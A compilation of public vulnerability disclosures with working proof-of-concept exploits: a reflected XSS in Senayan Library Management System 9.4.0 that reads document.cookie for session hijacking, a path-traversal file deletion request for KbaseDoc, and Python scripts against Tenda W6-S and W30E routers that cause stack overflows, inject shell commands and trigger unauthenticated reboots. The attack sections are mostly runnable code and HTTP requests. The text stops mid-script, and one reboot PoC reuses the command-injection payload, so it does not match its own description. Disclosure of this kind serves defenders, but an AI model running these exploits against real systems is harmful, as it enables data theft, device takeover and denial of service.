Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Senayan Library Management System 9.4.0 Cross Site Scripting

Kbase Doc v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /web/IndexController.java.

****KbaseDoc V1.0 has an arbitrary file deletion vulnerability******Description:**

Kbase doc has an arbitrary file deletion vulnerability in src/main/java/com/eastrobot/doc/web/IndexController.java

Source code download address: https://github.com/ekoz/kbase-doc

Version: 1.0

**Vulnerability analysis:**

Locate the location where the vulnerability exists: src/main/java/com/eastrobot/doc/web/IndexController.java 

The POST request gets the name parameter,Since there is no filtering,As a result, parameters such as ../ can be spliced,Causes directory traversal,Because deletion is involved,Resulting in arbitrary file deletion vulnerability.

**Recurrence of vulnerability**

**Download the source code and build the local environment**

Create a poc.txt file in the kbase-doc-master\target\classes directory .

Use burpsuite to construct the following request.

\[+\] POC:

    POST /index/delete HTTP/1.1
    Host: test:8081
    Content-Length: 22
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: chrome-extension://coohjcphdfgbiolnekdpbcijmhambjff
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie:__utma=71411734.247469081.1654064241.1654064241.1654064241.1; __utmz=71411734.1654064241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
    Connection: close
    
    name=..%2F..%2Fpoc.txt
    
    

It is found that poc.txt is deleted.

**Proof and Exploit:**

href

CVE-2022-45290: KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability/README.md at main · HH1F/KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the linkEn parameter at /goform/setAutoPing.

Permalink

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/setAutoPing, when linkEn is 1, ping1 and ping2 will be spliced into v9 by sprintf. It is worth noting that there is no size check which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/setAutoPing'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'linkEn=1&ping1=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45503: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the wl_radio parameter at /goform/WifiMacFilterGet.

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiMacFilterGet, when wl\_radio is 0, the index will be spliced into v6 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/WifiMacFilterGet'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'wl\_radio=0&index=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45499: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a command injection vulnerability in the tpi_get_ping_output function at /goform/exeCommand.

**Tenda W6-S V1.0.0.4(510) command injection vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/exeCommand, cmdinput is controlled by the user, it will be copied to s by vos\_strcpy, and finally tpi\_get\_ping\_output will be called to execute the command, which is not restricted, resulting in a command injection vulnerability

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/exeCommand'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=asd;ls -la . > ./tmp/test;aa'

requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the command was executed successfully, and finally you can write exp to get the root shell

CVE-2022-45497: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the wl_radio parameter at /goform/wifiSSIDset.

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/wifiSSIDset, when wl\_radio is 0, the index will be spliced into v24 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/wifiSSIDset'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'wl\_radio=0&index=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45501: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the cmdinput parameter at /goform/exeCommand.

Permalink

Cannot retrieve contributors at this time

**Tenda W30E V1.0.1.25(633) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2218.html
    

**Affected version**

**Vulnerability details**

In /goform/exeCommand, cmdinput will be copied to s by strcpy. It is worth noting that there is no size check, resulting in a stack overflow vulnerability

**Poc**

import requests

target\_url \= 'http://192.168.10.103/login/Auth'

target\_headers \= {'Host' : '192.168.10.103',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.103',
'Referer' : 'http://192.168.10.103/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.103/goform/exeCommand'

target\_headers \= {'Host' : '192.168.10.103',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.103',
'Referer' : 'http://192.168.10.103/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router crashed, and finally you can write an exp to get a root shell

CVE-2022-45505: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An issue in the component tpi_systool_handle(0) (/goform/SysToolReboot) of Tenda W6-S v1.0.0.4(510) allows unauthenticated attackers to arbitrarily reboot the device.

Permalink

**Tenda W6-S V1.0.0.4(510) Reboot router without authentication****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/SysToolReboot, tpi\_systool\_handle(0) will cause the entire router to reboot without authorization

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/SysToolReboot'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=asd;ls -la . > ./tmp/test;aa'

requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router restarts

CVE-2022-45498: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An issue in the component tpi_systool_handle(0) (/goform/SysToolRestoreSet) of Tenda W6-S v1.0.0.4(510) allows unauthenticated attackers to arbitrarily reboot the device.

Permalink

**Tenda W6-S V1.0.0.4(510) Reboot router without authentication****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/SysToolRestoreSet, tpi\_systool\_handle(0) will cause the entire router to reboot without authorization

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
